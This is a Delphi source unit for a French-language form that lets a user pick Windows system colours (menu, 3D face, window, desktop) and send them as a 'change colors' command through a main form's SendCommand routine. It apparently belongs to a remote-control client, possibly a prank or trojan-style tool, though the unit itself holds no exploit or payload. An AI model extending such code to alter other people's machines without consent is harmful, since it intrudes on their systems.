(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untColors.pas                                   ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Colors form                      ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untColors;

interface

uses
  Classes, SysUtils, Controls, Forms, Buttons, StdCtrls, ExtCtrls, Dialogs,
  Graphics;

type
  TfrmColors = class(TForm)
    PntColor: TPanel;
    Label1: TLabel;
    Label2: TLabel;
    Label3: TLabel;
    Label4: TLabel;
    SpdChange: TSpeedButton;
    PntMenu: TPanel;
    Pnt3dFace: TPanel;
    PntWinColor: TPanel;
    PntDeskColor: TPanel;
    ColorDlg: TColorDialog;
    procedure FormCreate(Sender: TObject);
    procedure GlobalColor(Sender: TObject);
    procedure SpdChangeClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmColors: TfrmColors;

implementation

uses untMain, untCommands;

{$R *.DFM}

procedure TfrmColors.FormCreate(Sender: TObject);
begin
   Caption:='Couleurs Windows';
end;

procedure TfrmColors.GlobalColor(Sender: TObject);
begin
   with Sender as TPanel do
   begin
      ColorDlg.Color:=Color;
      if ColorDlg.Execute then
         Color:=ColorDlg.Color;
   end;
end;

procedure TfrmColors.SpdChangeClick(Sender: TObject);
var
   Args,c:string;
begin
   c:=Chr(13);
   Args:=IntToStr(ColorToRGB(PntMenu.Color)) + c +
         IntToStr(ColorToRGB(Pnt3dFace.Color)) + c +
         IntToStr(ColorToRGB(PntWinColor.Color)) + c +
         IntToStr(ColorToRGB(PntDeskColor.Color));
   frmMain.strStatus:='Changement des couleurs systeme...';
   frmMain.SendCommand(COMMAND_CHANGE_COLORS,Args);
end;

end.
